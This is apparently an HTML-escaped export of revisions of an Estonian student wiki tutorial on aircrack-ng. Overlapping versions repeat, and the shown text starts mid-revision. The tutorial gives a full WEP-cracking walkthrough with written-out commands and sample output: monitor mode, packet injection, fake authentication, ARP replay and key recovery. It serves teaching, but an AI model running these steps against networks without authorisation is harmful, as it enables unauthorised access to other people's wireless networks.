ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Märge:&#039;&#039;&#039; Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;airmon-ng stop athX&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav &#039;&#039;airmon-ng stop ath0&#039;&#039; käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kontrolli:&#039;&#039;&#039; Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-9 - “süstimise” test&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-e teddy – raadiovõrgu nimi&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-c 9 – raadiovõrgu kanal&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-1 – võlts autentimine&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;0 – kordusühendus(t)e aeg sekundites&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
&#039;&#039;-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89326</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89326"/>
		<updated>2015-05-25T19:50:47Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Näide WEP võtme lahti murdmise protsessist */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit. &lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]&amp;lt;/ref&amp;gt;: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]&amp;lt;/ref&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]&amp;lt;/ref&amp;gt;:&amp;lt;br&amp;gt;&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liides:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Märge:&#039;&#039;&#039; Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;airmon-ng stop athX&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav &#039;&#039;airmon-ng stop ath0&#039;&#039; käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kontrolli:&#039;&#039;&#039; Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-9 - “süstimise” test&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-e teddy – raadiovõrgu nimi&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
